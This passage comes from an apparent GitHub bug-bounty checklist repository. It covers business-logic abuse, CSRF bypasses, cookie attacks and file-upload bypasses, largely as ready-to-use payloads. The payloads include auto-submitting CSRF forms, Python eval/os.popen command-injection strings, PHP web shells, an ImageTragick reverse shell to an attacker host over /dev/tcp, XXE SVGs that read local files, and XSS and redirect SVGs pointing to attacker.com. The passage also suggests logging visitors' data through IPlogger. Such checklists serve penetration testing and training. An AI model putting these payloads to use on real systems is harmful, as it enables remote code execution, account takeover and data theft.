24 | - Try to see if the file upload field is allowing any exts, it's often observed that the devs miss out on implementing protections on such endpoints.
25 | - Try to post reviews like some other users.
26 | - Try performing CSRF on this functionality, often is not protected by tokens
27 |
28 | 8. **Coupon Code Functionality**
29 | - Apply the same code more than once to see if the coupon code is reusable.
30 | - If the coupon code is uniquely usable, try testing for Race Condition on this function by using the same code for two accounts at a parallel time.
31 | - Try Mass Assignment or HTTP Parameter Pollution to see if you can add multiple coupon codes while the application only accepts one code from the Client Side.
32 | - Try performing attacks that are caused by missing input sanitization such as XSS, SQLi, etc. on this field
33 | - Try adding discount codes on the products which are not covered under discounted items by tampering with the request on the server-side.
34 |
35 | 9. **Delivery Charges Abuse **
36 | - Try tampering with the delivery charge rates to -ve values to see if the final amount can be reduced.
37 | - Try checking for the free delivery by tampering with the params.
38 |
39 | 10. **Currency Arbitrage **
40 | - Pay in 1 currency say USD and try to get a refund in EUR. Due to the diff in conversion rates, it might be possible to gain more amount.
41 |
42 | 11. **Premium Feature Abuse **
43 | - Try forcefully browsing the areas or some particular endpoints which come under premium accounts.
44 | - Pay for a premium feature and cancel your subscription. If you get a refund but the feature is still usable, it's a monetary impact issue.
45 | - Some applications use true-false request/response values to validate if a user is having access to premium features or not.
46 | - Try using Burp's Match & Replace to see if you can replace these values whenever you browse the app & access the premium features.
47 | - Always check cookies or local storage to see if any variable is checking if the user should have access to premium features or not.
48 |
49 | 12. **Refund Feature Abuse**
50 | - Purchase a product (usually some subscription) and ask for a refund to see if the feature is still accessible.
51 | - Try for currency arbitrage explained yesterday.
52 | - Try making multiple requests for subscription cancellation (race conditions) to see if you can get multiple refunds.
53 |
54 | 13. **Cart/Wishlist Abuse **
55 | - Add a product in negative quantity with other products in positive quantity to balance the amount.
56 | - Add a product in more than the available quantity.
57 | - Try to see when you add a product to your wishlist and move it to a cart if it is possible to move it to some other user's cart or delete it from there.
58 |
59 | 14. **Thread Comment Functionality**
60 | - Unlimited Comments on a thread
61 | - Suppose a user can comment only once, try race conditions here to see if multiple comments are possible.
62 | - Suppose there is an option: comment by the verified user (or some privileged user) try to tamper with various parameters in order to see if you can do this activity.
63 | - Try posting comments impersonating some other users.
64 |
65 | 15. **Parameter Tampering **
66 | - Tamper Payment or Critical Fields to manipulate their values
67 | - Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment
68 | - Response Manipulation to bypass certain restrictions such as 2FA Bypass
69 |
70 | 16. **Parameter tampering can result in product price manipulation**
71 | - https://www.youtube.com/watch?v=3VMlV7j_yzg
72 |
73 | 17. **Manipulation of exam results at Semrush.Academy**
74 | - In this situation, it was possible to bypass the exam process. That is to replace the results of the exam with the correct ones and send a request to get the certificate right away. And to replace the results with the correct ones turned out, because the body of the request was json, where 1 = true, and empty = false.
75 |
76 | Steps To Reproduce:
77 |
78 | 1. Finished exams with any answers
79 | 2. Retake exam
80 | 3. Send the last request of our answer
81 |
82 | Example body: `{"answers":{"503":"","504":"","505":"1","506":"","507":"","591":"1","592":"","593":"","594":"","595":"","596":"","1340":"1","1341":"","1342":"","1343":"","1344":"","1345":"","1351":"1","1352":"","1353":"","1354":"","1355":"","1356":"","1357":"","1358":"1","1359":"","1360":"","1361":"","1362":"","1363":"","1365":"1"}}
83 |
84 |
85 | 18. **Authentication flags and privilege escalations at application layer.**
86 | Applications have their own access control lists (ACLs) and privileges. The most critical aspect of the application related to security is authentication. An authenticated user has access to
87 | the internal pages and structures that reside behind the login section. These privileges can be maintained by the database, LDAP, file etc. If the implementation of authorization is weak, it
88 | opens up possible vulnerabilities. If these vulnerabilities are identified
89 | during a test, then there is the potential for exploitation. This exploitation would likely include accessing another user’s content or becoming a higher-level user with greater permissions to do greater damage
90 | ***How to test for this business logic flaw:***
91 | ```
92 | • During the profiling phase or through a proxy observe the HTTP traffic, both request and response blocks.
93 | • POST/GET requests would have typical parameters either in name-value pair, JSON, XML or Cookies. Both the name of
94 | the parameter and the value need to be analyzed.
95 | • If the parameter name is suspicions and suggests that it has something to do with ACL/Permission then that becomes a
96 | target.
97 | • Once the target is identified, the next step is evaluating the value, it can be encoded in hex, binary, string, etc.. The tester
98 | should do some tampering and try to define its behavior with bit of fuzzing.
99 | • In this case, fuzzing may need a logical approach, changing bit patterns or permission flags like 1 to 0 or Y to N and so
100 | on. Some combination of bruteforcing, logical deduction and artistic tampering will help to decipher the logic. If this is
101 | successful then we get a point for exploitation and end up escalating privileges or bypassing authorization.
102 | ```
103 |
104 |
105 | 19. **Critical Parameter Manipulation and Access to Unauthorized Information/Content.**
106 | HTTP GET and POST requests are typically accompanied with several parameters when submitted to the application. These parameters can be in the form of name/value pairs, JSON, XML etc. Interestingly, these parameters can be tampered with and guessed (predicted) as well. If the business logic of the application is processing these parameters before validating them, it can lead to information/content disclosure. This is another common business logic flaw that is easy to exploit
107 | ***How to test for this business logic flaw:***
108 | ```
109 | • During the profiling phase or through a proxy, observe HTTP traffic, both request and response blocks.
110 | • POST/GET requests would have typical parameters either in name-value pair, JSON, XML or Cookies. Both the name of
111 | the parameter and the value need to be analyzed.
112 | • Observe the values in the traffic and look for incrementing numbers and easily guessable values across all parameters.
113 | • This parameter’s value can be changed and one may gain unauthorized access.
114 | In the above case we were able to access other users profiles
115 | ```
116 |
117 |
118 | 20. **Developer’s cookie tampering and business process/logic bypass.**
119 | Cookies are an essential component to maintain state over HTTP. In many cases, developers are not using session cookies only, but instead are building data internally using session only variables. Application developers set new cookies on the browser at important junctures which exposes logical holes. After authentication logic sets several parameters based
120 | on credentials, developers have two options to maintain these credentials across applications. The developer can set the parameters in session variables or set cookies in the browser
121 | with appropriate values. If application developers are passing cookies, then
122 | they might be reverse engineered or have values that can be guessed/ deciphered. It can create a possible logical hole or bypass. If an attacker can identify this hole then they can exploit it with ease
123 | ***How to test for this business logic flaw:***
124 | ```
125 | • During the profiling phase or through a proxy observe the HTTP traffic, both request and responseblocks.
126 | • Analyze all cookies delivered during the profiling, some of these cookies will be defined by developers and are not
127 | session cookies defined by the web application server.
128 | • Observe cookie values in specific, look for incrementing easily guessable values across all cookies.
129 | • Cookie value can be changed and one may gain unauthorized access or logical escalation
130 | ```
131 |
132 |
133 |
134 | 21. ** LDAP Parameter Identification and Critical Infrastructure Access**
135 | LDAP is becoming an important aspect for large applications and it may get integrated with ”single sign on” as well. Many infrastructure layer tools like Site Minder or Load Balancer use LDAP for both authentication and authorization. LDAP parameters can carry business logic decision flags and those can be abused and leveraged. LDAP filtering being done at the business application layer enable logical injections to be possible on those parameters. If the application is
136 | not doing enough validation then LDAP injection and business layer bypasses are possible.
137 |
138 | ***How to test for this business logic flaw:***
139 | ```
140 | • During the profiling phase or through a proxy observe the HTTP traffic, both request and response blocks.
141 | • POST/GET requests would have typical parameters either in name-value pair, JSON, XML or Cookies. Both the name of
142 | the parameter and the value need to be analyzed.
143 | • Analyze parameters and their values, look for ON,CN,DN etc. Usually these parameters are linked with LDAP. Also look
144 | for the parameter taking email or usernames, these parameters can be prospective targets.
145 | • These target parameters can be manipulated and injected with “*” or any other LDAP specific filters like OR, AND etc. It
146 | can lead to logical bypass over LDAP and end up escalating access rights.
147 | ```
148 |
149 |
150 | 22. **Business Constraint Exploitation**
151 | The application’s business logic should have defined rules and constraints that are very critical for an application. If these constraints are bypassed by an attacker, then it can be exploited. User
152 | fields that have poor design or implementation are often controlled by these business constraints. If business logic is processing variables controlled as hidden values then it leads to easy discovery and exploitation. While crawling and profiling the application, one can list all these possible different values and their injection places. It is easy to browse through these hidden fields and understand their context; if context is leveraged to control the business rules then manipulation of this information can lead to critical business logic vulnerabilities.
153 | ***How to test for this business logic flaw:***
154 | ```
155 | • During the profiling phase or through a proxy observe the HTTP traffic, both the request and response blocks.
156 | • POST/GET requests would have typical parameters either in name-value pair, JSON, XML or Cookies. Both the name of
157 | the parameter and the value need to be analyzed.
158 | • Analyze hidden parameters and their values, look for business specific calls like transfer money, max limit etc. All these parameters which are dictating a business constraint can become a target.
159 | • These target parameters can be manipulated and values can be changed. It is possible to avoid the business constraint and inject an unauthorized transaction.
160 | ```
161 |
162 |
163 | 23. **Business Flow Bypass**
164 | Applications include flows that are controlled by redirects and page transfers. After a successful login, for example, the application will transfer the user to the money transfer page.During these transfers, the user’s session is maintained by a session cookie or other mechanism. In many cases,
165 | this flow can be bypassed which can lead to an error condition or information leakage. This leakage can help an attacker identify critical back-end information. If this flow is controlling
166 | and giving critical information out then it can be exploited in various use cases and scenarios
167 | ***How to test for this business logic flaw:***
168 | ```
169 | • During the profiling phase or through a proxy observe the HTTP traffic, both request and response blocks.
170 | • POST/GET requests would have typical parameters either in name-value pair, JSON, XML or Cookies. Both the name of the parameter and the value need to be analyzed.
171 | • Identify business functionalities which are in specific steps (e.g. a shopping cart or wire transfer).
172 | • Analyze all steps carefully and look for possible parameters which are added by the application either using hidden values or through JavaScript.
173 | • These parameters can be tampered through a proxy while making the transaction. This disrupts the flow and can end up bypassing some business constraints.
174 | ```
175 |
176 |
177 | 24. ** Identity or Profile Extraction**
178 | A user’s identity is one of the most critical parameters in authenticated applications. The identities of users are maintained using session or other forms of tokens. Poorly designed and
179 | developed applications allow an attacker to identify these token parameters from the client side and in some cases they are not closely maintained on the server side of the session as well. This scenario opens up a potential opportunity for abuse and system wide exploitation. The
180 | token is either using only a sequential number or a guessable username
181 | ***How to test for this business logic flaw:***
182 | ```
183 | • During the profiling phase or through particular proxy observe HTTP traffic, both request and response blocks.
184 | • POST/GET requests would have typical parameters either in name-value pair, JSON, XML or Cookies. Both name of parameter and value need to be analyzed.
185 | • Look for parameters which are controlling profiles.
186 | • Once these target parameters are identified, one can decipher, guess or reverse engineer tokens. If tokens are guessed and reproduced – game over!
187 | ```
188 |
189 |
190 | 25. **File or Unauthorized URL Access and Business Information Extraction Identity**
191 | Business applications contain critical information in their features, in the files that are exported and in the export functionality itself. A user can export their data in a selected file format (PDF, XLS or CSV) and download it. If this functionality is not carefully implemented, it can enable asset leakage. An attacker can extract this information from the application layer. This is one of the most common mistakes and easy to exploit as well. These files can be fetched directly
192 | from URLs or by using some internal parameters.
193 | ***How to test for this business logic flaw:***
194 | ```
195 | • During the profiling phase or through a particular proxy, observe the HTTP traffic, both request and response blocks.
196 | • POST/GET requests would have typical parameters either in a name-value pair, JSON, XML or Cookie. Both the name of parameter and value need to be analyzed.
197 | • Identify file call functionalities based on parameter names like file, doc, dir etc. These parameters will point you to possible unauthorized file access vulnerabilities.
198 | • Once a target parameter has been identified start doing basic brute force or guess work to fetch another user’s files from server.
199 | ```
200 |
201 | 26. null pyloads
202 | 27. in change password try to delete current password
203 |
--------------------------------------------------------------------------------
/CSRF/csrf.md:
--------------------------------------------------------------------------------
1 | ### CSRF bybass methods
2 | - NO csrf token
3 | - weak csrf token
4 | - check content type
5 | - check referer header
6 | - chnage POST to GET or GET to post
7 |
8 | ### CSRF token bybass methods
9 | - reomving ANI-csrf token
10 | - NO check for the users token
11 | - weak token
12 | - Reasuable token
13 | - change request method
14 | - Guessable token
15 | - Bybass referer
16 |
17 | ### method attacks
18 | - remove referer header and send request and check response
19 | - remove original header and send request and check response
20 | - remove csrf token and send request and check response
21 |
22 |
23 |
24 | ### Basic method no defenses
25 | - the request
26 | ```
27 | POST /myaccount/changeemail
28 | HOST:
29 |
30 |
31 | email=....
32 | ```
33 |
34 | - the exploit
35 | ```html
36 | <form action="" method="POST">
37 | <input type="hidden" name="email" value="">
38 | </form>
39 | <script>
40 | document.forms[0].submit();
41 | </script>
42 |
43 | ```
44 | ### CSRF where token validation depends on token being present
45 | - the request
46 | ```
47 | POST /myaccount/changeemail
48 | HOST:
49 |
50 |
51 | email=....&csrftoken=.....
52 | ```
53 | - TIPS: reomve the csrf token
54 | -THE exploit
55 |
56 | ```html
57 | <form action="" method="POST">
58 | <input type="hidden" name="email" value="">
59 | </form>
60 | <script>
61 | document.forms[0].submit();
62 | </script>
63 | ```
64 |
65 | ### CSRF where token validation depends on request method
66 | - the request
67 | ```
68 | POST /myaccount/changeemail
69 | HOST:
70 |
71 |
72 | email=....&csrftoken=.....
73 | ```
74 | - TIPS: reomve the csrf token
75 | - Tips: change request TO GET in CSRF payloads
76 | -THE exploit
77 |
78 | ```html
79 | <form action="" method="GET">
80 | <input type="hidden" name="email" value="">
81 | </form>
82 | <script>
83 | document.forms[0].submit();
84 | </script>
85 | ```
86 |
87 | ### CSRF where token is not tied to user session
88 | - steps
89 | 1- create two accounts
90 | 2- go to the first account and change email we will change
91 | 3- go to second account and try intersept change email then drop request , copy the csrf token
92 | 4- go to the first account and put csrf token(second account) and try change email is valid or not
93 |
94 |
95 | ### csrf bypass via method override
96 | ```
97 | <html>
98 | <body>
99 | <script>history.pushState(' ', ' ' ,'/')</script>
100 | <form action="" method="GET">
101 | <input type="hidden" name="_method" value="POST">
102 | <input type="hidden" name="email" value="">
103 | </form>
104 | <script>
105 | document.forms[0].submit();
106 | </script>
107 | </body>
108 | </html>
109 | ```
110 | ### CSRF where token is duplicated in cookie
111 | ```html
112 | <html>
113 | <body>
114 | <script>history.pushState(' ',' ','/')</script>
115 | <form action="https://0a6a006c04de5fc7829147ec00750057.web-security-academy.net/my-account/change-email" method="POST"/>
116 | <input type="hidden" name="email" value="a@gmail.com"/>
117 | <input type="hidden" name="csrf" value="fake"/>
118 | <input type="submit" value="submit request"/>
119 | </form>
120 | <img src="https://0a6a006c04de5fc7829147ec00750057.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
121 | </body>
122 | </html>
123 | ```
124 | ### CSRF where Referer validation depends on header being present
125 | ```html
126 | <html>
127 | <head>
128 | <meta name="referrer" content="no-referrer" >
129 | </head>
130 | <body>
131 | <script>history.pushState(' ', ' ' ,'/')</script>
132 | <form action="https://0a390078039fe0a780e435a600ca0059.web-security-academy.net/my-account/change-email" method="POST">
133 | <input type="hidden" name="email" value="a@gmail.com">
134 | <input type="submit" value="submit" >
135 | </form>
136 | <script>
137 | document.forms[0].submit();
138 | </script>
139 | </body>
140 | </html>
141 | ```
142 |
143 | ### CSRF with broken Referer validation
144 | ```html
145 | <html>
146 | <body>
147 | <script>history.pushState(' ', ' ' ,'/?0ad4003504bb812580aae57c00c40072.web-security-academy.net')</script>
148 | <form action="https://0ad4003504bb812580aae57c00c40072.web-security-academy.net/my-account/change-email" method="POST">
149 | <input type="hidden" name="email" value="a@gmail.com">
150 | <input type="submit" value="submit" >
151 | </form>
152 | <script>
153 | document.forms[0].submit();
154 | </script>
155 | </body>
156 | </html>
157 | ```
158 |
--------------------------------------------------------------------------------
/Cookie Attack/cookie.md:
--------------------------------------------------------------------------------
1 | [ ] sensetive Data Stored in Cookies
2 | ```
3 | check if anf pii or other sensitive infromation stored in cookies this in fromation usually includes : email,sessionID, data of birth ,mobile address ,ssn ,etc.
4 | ```
5 |
6 | [ ] cookie length violation
7 | leads to Buffer Overflow : A cookie length which is longer than profiled length can indicate that a buffer overflow attack attempt takes place. In a buffer overflow attack, the attacker will have to send very long strings that will generate the overflow, all of them generating this Violation.
8 |
9 | ```
10 | GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
11 |
12 | NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
13 |
14 | NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
15 |
16 | NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a
17 | ```
18 |
19 | [ ] Arbitrary Cookie injection
20 | ```
21 | try injecting some arbitrary cookies using attack such as CRLF injection ,
22 | some times it can be used to escalate privilege or if the application malfunction, it can reveal sensitive infromation through stack traces
23 | ```
24 |
25 | [ ] Mass Assignment
26 | ```
27 | similar to the parameter poolution, however in this , attacker tried to inject multiple user ID in same user_id parameter
28 | ```
29 |
30 | [ ] Damial of service - cookie Bomb
31 | ```
32 | forcing the server to process cookies larger than the resricted cookie size defined by the server may cause danial of service attack
33 |
34 | https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx
35 |
36 | After input "xxxxxxxxxxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
37 |
38 | References: [Hackerone #105363](https://hackerone.com/reports/105363)
39 |
40 | ```
41 |
42 | [ ] SQL injection
43 | ```
44 | How to inject the code in Cookies?
45 | There are many HTTP interceptors and HTTP editors that can intercept the HTTP request before it is sent to the server. Then the tester can introduce his malicious SQL statement in the cookie field.
46 |
47 | It’s like a get/post based SQL Injection, except that certain characters can’t be used. For example, ‘**;**‘ and ‘**,**‘ are typically treated as delimiters, so they end the injection if they aren’t URL-encoded.
48 |
49 | Cookie : sessionId=xxxbad1fdc’ order by 1# (Normal)_
50 | Cookie : sessionId=xxxbad1fdc’ order by 2# (Error)_
51 |
52 | after error
53 | sqlmap -u "" --cookie="" -p "" --dbs
54 | ```
55 |
56 | [ ] parameter pollution
57 | ```
58 | 1. Assume that cookie utilize a parameter called **user_id=** to rerieve some data
59 | 2. however , the application is not vulnerability to idor and change **user_id** to victim value dosnt help you
60 | 3.attacker ,add an addition another **user_id=** parameter value to rhe cookie with vuctim user ID LIke: **user_id=atacker&user_id=victim**
61 | 4. Three things can happen here:
62 | - the application may retrieve data of victim data
63 | - the application may retrieve data of victim data and attacker data
64 | - the application is not retrieve data it is not vulnerability
65 | ```
66 |
67 | [ ] Authentication Bybass (cookie are not avalid)
68 | ```
69 | try accessing a protected resource by removing cookies
70 | ```
71 |
72 | [ ] xss
73 | ```
74 | assume that the value of the cookie parameter "name" is reflected in the application
75 | change the "name" value to "xss payload"
76 | ```
77 |
78 | [ ] Insufficient session management
79 | ```
80 | 1. session doesnt expire on logout
81 | 2. long session expirey
82 | 3. session doesnt expire on password reset /change
83 | 4. concurrent session
84 | ```
85 |
86 | [ ] privilege escalation
87 | - horizontal
88 | ```
89 | 1.assume that the application uses mult-organization models
90 | 2.cookie are used wich organized user can access
91 | 3.alter the cookie in order to access some other application
92 | ```
93 | - vertical
94 | ```
95 | 1.assume the cookie are used to determine the role of the user
96 | 2.alter the cookie in order to elevate the role of the user
97 | ```
98 | - similarly
99 | ```
100 | 1.try if the flower users cookies can be used to access higher users function
101 | 2.try if the cookie of organization 1 user van be used to access function of organizaion 2
102 | ```
103 |
104 | [ ] sesion puzzing
105 | ```
106 | when an application utilzes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user
107 | ```
108 |
109 |
110 |
111 | [ ] Exploiting Python Code Injection
112 | this payload in cookie or contenttype or path or parameter
113 |
114 | ```python
115 | eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))
116 | ```
117 |
118 | [ ] OS command injection
119 |
120 | ```python
121 | **eval(compile("""for x in range(1):\\n import os\\n os.popen(r'COMMAND').read()""",'','single'))**
122 | ```
123 |
124 | ```python
125 | eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))
126 | ```
127 |
128 | ```python
129 | **__import__('os').popen('COMMAND').read()**
130 | ```
131 |
132 | [ ] URL encode some characters
133 | ```python
134 | param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29
135 | ```
136 |
137 | ```python
138 | param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29
139 | ```
140 |
141 | ```python
142 | param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29
143 | ```
144 |
145 | ```python
146 | param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29
147 | ```
148 |
149 | Example with one expression
150 | ```python
151 | __import__('os').popen('COMMAND').read()
152 | ```
153 |
154 | Example with multiple expressions, separated by commas
155 | ```python
156 | str("-"*50),__import__('os').popen('COMMAND').read()
157 | ```
158 | [ ] Insecure Deserialization
159 | ```
160 | if cookis are using serialized Objects ,try performing insecure Deserialization Checks.
161 | portswigger laps
162 | ```
163 | [ ] Electronic Code Book
164 | [ ] Pickle Code Execution
165 | [ ] Cipher block chainin
166 | [ ] file inclusion
167 | [ ] IDOr
168 | [ ] session fixation
169 | [ ] padding oracle attack
170 | [ ] jwt attack
171 |
--------------------------------------------------------------------------------
/File Upload/File Upload.md:
--------------------------------------------------------------------------------
1 | ## Where to find
2 | In upload file feature, for example upload photo profile feature
3 |
4 | ## How to exploit
5 | read also this pdf it conayin a many of ideas
6 | 1-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/File-Upload.pdf by`0xAwali`
7 | 2-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/Slides(1).pdf by`ebrahim hegazy`
8 |
9 | 1. Change the `Content-Type` value
10 | ```
11 | POST /images/upload/ HTTP/1.1
12 | Host: target.com
13 | ...
14 |
15 | ---------------------------829348923824
16 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
17 | Content-Type: application/x-php
18 | ```
19 | Change the Content-Type
20 | ```
21 | POST /images/upload/ HTTP/1.1
22 | Host: target.com
23 | ...
24 |
25 | ---------------------------829348923824
26 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
27 | Content-Type: image/jpeg
28 | ```
29 |
30 | 2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
31 | ```
32 | POST /images/upload/ HTTP/1.1
33 | Host: target.com
34 | ...
35 |
36 | ---------------------------829348923824
37 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
38 | Content-Type: application/x-php
39 | ```
40 | Change the request to this
41 | ```
42 | POST /images/upload/ HTTP/1.1
43 | Host: target.com
44 | ...
45 |
46 | ---------------------------829348923824
47 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
48 | Content-Type: application/x-php
49 | ```
50 |
51 | 3. Upload the payload, but start with GIF89a; and
52 | ```
53 | POST /images/upload/ HTTP/1.1
54 | Host: target.com
55 | ...
56 |
57 | ---------------------------829348923824
58 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
59 | Content-Type: image/gif
60 |
61 | GIF89a; <?php system("id") ?>
62 | ```
63 | And dont forget to change the content-type to image/gif
64 |
65 | 4. Bypass content length validation, it can be bypassed using small payload
66 | ```
67 | (<?=`$_GET[x]`?>)
68 | ```
69 |
70 | 5. Using null byte in filename
71 | ```
72 | file.php%00.gif
73 | ```
74 |
75 | 6. Using double extensions for the uploaded file
76 | ```
77 | file.jpg.php
78 | ```
79 |
80 | 7. Uploading an unpopular php extensions (php4,php5,php6,phtml)
81 | ```
82 | file.php5
83 | ```
84 |
85 | 8. Try to randomly capitalizes the file extension
86 | ```
87 | file.pHP5
88 | ```
89 |
90 | 9. Mix the tips!
91 |
92 |
93 | - Upload Function
94 | - Extensions Impact
95 | - `ASP`, `ASPX`, `PHP5`, `PHP`, `PHP3`: Webshell, RCE
96 | - `SVG`: Stored XSS, SSRF, XXE
97 | - `GIF`: Stored XSS, SSRF
98 | - `CSV`: CSV injection
99 | - `XML`: XXE
100 | - `AVI`: LFI, SSRF
101 | - `HTML`, `JS` : HTML injection, XSS, Open redirect
102 | - `PNG`, `JPEG`: Pixel flood attack (DoS)
103 | - `ZIP`: RCE via LFI, DoS
104 | - `PDF`, `PPTX`: SSRF, BLIND XXE
105 | - Blacklisting Bypass
106 | - PHP → `.phtm`, `phtml`, `.phps`, `.pht`, `.php2`, `.php3`, `.php4`, `.php5`, `.shtml`, `.phar`, `.pgif`, `.inc`
107 | - ASP → `asp`, `.aspx`, `.cer`, `.asa`
108 | - Jsp → `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf`
109 | - Coldfusion → `.cfm`, `.cfml`, `.cfc`, `.dbm`
110 | - Using random capitalization → `.pHp`, `.pHP5`, `.PhAr`
111 | - Whitelisting Bypass
112 | - `file.jpg.php`
113 | - `file.php.jpg`
114 | - `file.php.blah123jpg`
115 | - `file.php%00.jpg`
116 | - `file.php\x00.jpg` this can be done while uploading the file too, name it `file.phpD.jpg` and change the D (44) in hex to 00.
117 | - `file.php%00`
118 | - `file.php%20`
119 | - `file.php%0d%0a.jpg`
120 | - `file.php.....`
121 | - `file.php/`
122 | - `file.php.\`
123 | - `file.php#.png`
124 | - `file.`
125 | - `.html`
126 | - Vulnerabilities
127 | - [ ] Directory Traversal
128 | - Set filename `../../etc/passwd/logo.png`
129 | - Set filename `../../../logo.png` as it might changed the website logo.
130 | - [ ] SQL Injection
131 | - Set filename `'sleep(10).jpg`.
132 | - Set filename `sleep(10)-- -.jpg`.
133 | - [ ] Command Injection
134 | - Set filename `; sleep 10;`
135 | - [ ] SSRF
136 | - Abusing the "Upload from URL", if this image is going to be saved in some public site, you could also indicate a URL from [IPlogger](https://iplogger.org/invisible/) and steal information of every visitor.
137 | - SSRF Through `.svg` file.
138 |
139 | ```php
140 | <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="https://attacker.com/picture.jpg" /></svg>
141 | ```
142 |
143 | - [ ] ImageTragic
144 |
145 | ```
146 | push graphic-context
147 | viewbox 0 0 640 480
148 | fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
149 | pop graphic-context
150 | ```
151 |
152 | - [ ] XXE
153 | - Upload using `.svg` file
154 |
155 | ```xml
156 | <?xml version="1.0" standalone="yes"?>
157 | <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
158 | <svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
159 | <text font-size="40" x="0" y="16">&xxe;</text>
160 | </svg>
161 | ```
162 |
163 | ```xml
164 | <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
165 | <image xlink:href="expect://ls"></image>
166 | </svg>
167 | ```
168 |
169 | - Using excel file
170 | - [ ] XSS
171 | - Set file name `filename="svg onload=alert(document.domain)>"` , `filename="58832_300x300.jpg<svg onload=confirm()>"`
172 | - Upload using `.gif` file
173 |
174 | ```
175 | GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
176 | ```
177 |
178 | - Upload using `.svg` file
179 |
180 | ```xml
181 | <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
182 | ```
183 |
184 | ```xml
185 | <?xml version="1.0" standalone="no"?>
186 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
187 |
188 | <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
189 | <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
190 | <script type="text/javascript">
191 | alert("HolyBugx XSS");
192 | </script>
193 | </svg>
194 | ```
195 |
196 | - [ ] Open Redirect
197 | 1. Upload using `.svg` file
198 |
199 | ```xml
200 | <code>
201 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
202 | <svg
203 | onload="window.location='https://attacker.com'"
204 | xmlns="http://www.w3.org/2000/svg">
205 | <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
206 | </svg>
207 | </code>
208 | ```
209 |
210 | - Content-ish Bypass
211 | - [ ] Content-type validation
212 | - Upload `file.php` and change the `Content-type: application/x-php` or `Content-Type : application/octet-stream`
213 | to `Content-type: image/png` or `Content-type: image/gif` or `Content-type: image/jpg`.
214 | - [ ] Content-Length validation
215 | - Small PHP Shell
216 |
217 | ```php
218 | (<?=`$_GET[x]`?>)
219 | ```
220 |
221 | - [ ] Content Bypass Shell
222 | - If they check the Content. Add the text "GIF89a;" before you shell-code. ( `Content-type: image/gif` )
223 |
224 | ```php
225 | GIF89a; <?php system($_GET['cmd']); ?>
226 | ```
227 |
228 | - Misc
229 | - [ ] Uploading `file.js` & `file.config` (web.config)
230 | - [ ] Pixel flood attack using image
231 | - [ ] DoS with a large values name: `1234...99.png`
232 | - [ ] Zip Slip
233 | - If a site accepts `.zip` file, upload `.php` and compress it into `.zip` and upload it. Now visit, `site.com/path?page=zip://path/file.zip%23rce.php`
234 | - [ ] Image Shell
235 | - Exiftool is a great tool to view and manipulate exif-data. Then I will to rename the file `mv pic.jpg pic.php.jpg`
236 |
237 | ```php
238 | exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' pic.jpg
239 | ```
240 |
--------------------------------------------------------------------------------
/File Upload/File-Upload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Az0x7/vulnerability-Checklist/8e2b1ebe4446d5262e7877f70fc1404f99375434/File Upload/File-Upload.pdf
--------------------------------------------------------------------------------
/File Upload/Slides(1).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Az0x7/vulnerability-Checklist/8e2b1ebe4446d5262e7877f70fc1404f99375434/File Upload/Slides(1).pdf
--------------------------------------------------------------------------------
